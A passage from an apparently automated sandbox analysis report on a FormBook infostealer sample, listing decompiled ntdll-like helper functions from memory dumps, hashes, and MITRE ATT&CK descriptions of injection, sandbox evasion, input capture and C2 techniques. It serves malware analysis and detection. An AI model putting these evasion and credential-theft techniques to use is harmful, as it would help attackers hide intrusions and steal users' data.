Instruction ID: 4dcc2eb01a00f626d7d7209015027d7c4fdb913975e79bb57cb1a8f1a41ecaa5
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: E8C01236080248BBCB12AE82CC00F067B2AEB94B60F108025BA080E5608632E970EA88

Uniqueness

Uniqueness Score: -1.00%

Function 03443A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03443A1C(intOrPtr _a4) {
				void* _t5;

				return L03444620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x03443a35

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 97539e93cd28fcd711e7f822e04c02614eb2718411f1bdb468fc1f1ee244fa61
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 9EC08C32080248BBC712AE42DC00F01BB29E790B60F000021B6040EA708536EC60D58C

Uniqueness

Uniqueness Score: -1.00%

Function 034536CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E034536CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x034536d2
0x034536e8
0x034536d4
0x034536e5
0x034536e5

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 166ccad005e8f602c74e49595ccbbe339493a01fe9b6540ddb2f771490a95cdc
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 4CC09B79155540BFE725AF31CD51F1AB254F740A61F6C076D72214DAF1D56D9C00E508

Uniqueness

Uniqueness Score: -1.00%

Function 034376E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E034376E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x034376e4
0x00000000
0x034376f8
0x034376fd

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: a69213cc90af1358922b03e5cd4c8f10f5d0a1b19674b05ed3bc619874702eec
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 50C080B41811805EEB15D704CE30B213D546B0D614F4C019DA6411E5B2C358B403C10C

Uniqueness

Uniqueness Score: -1.00%

Function 0342AD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0342AD30(intOrPtr _a4) {

				return L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x0342ad49

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 40405b221347cdbcf9ef576ec05f17c61aea42159d06fb6c7e0a66c210b9a3b7
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 2EC08C32080248BBC712AA46CE00F017F29E790B60F000021F6040E6618A32E861D588

Uniqueness

Uniqueness Score: -1.00%

Function 03447D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03447D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x03447d56
0x03447d5b
0x03447d60
0x03447d5d
0x03447d5d
0x03447d5d

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: b6f87760602876da1e482bd039d7612a913a84d8aca2bdafd67232bcd1657bf0
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: BFB092343119408FDE16DF28C080B1633E8BB44A40B8800E0E400CBA20D329E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 03452ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03452ACB() {
				void* _t5;

				return E0343EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x03452adc

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: a5aa215aa561ecdc31d901cbbab9c08f4cf5f62c38da99b8506cf5ff6e18a4d0
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 5BB092328125408FCF02EB40C610B197331AB04650F05449590012B9208228AC01CA40

Uniqueness

Uniqueness Score: -1.00%

Function 034BFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E034BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0346CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E034B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E034B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x034bfdda
0x034bfde2
0x034bfde5
0x034bfdec
0x034bfdfa
0x034bfdff
0x034bfe0a
0x034bfe0f
0x034bfe17
0x034bfe1e
0x034bfe19
0x034bfe19
0x034bfe19
0x034bfe20
0x034bfe21
0x034bfe22
0x034bfe25
0x034bfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 034BFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034BFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034BFE2B

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 48a28a726b28cf5d7e603c1c7306187084509b6e8ce8f2559e4599d0708144bd
Instruction ID: 9b3b04eac4a6400fe42b3aed786aea1c19f4fd09ceb43dbbf9a7a1ae7cceeb66
Opcode Fuzzy Hash: 48a28a726b28cf5d7e603c1c7306187084509b6e8ce8f2559e4599d0708144bd
Instruction Fuzzy Hash: 61F0C8362006017FDA215E45DC01E67BB6ADB45730F240216F6285D5D1D962B83086B8

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SRMETALINDUSTRIES.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Function 0041867C, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Function 00418680, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON